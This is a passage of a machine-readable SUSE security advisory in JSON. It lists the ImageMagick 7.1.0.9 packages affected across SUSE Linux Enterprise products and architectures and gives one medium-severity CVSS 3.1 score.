"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
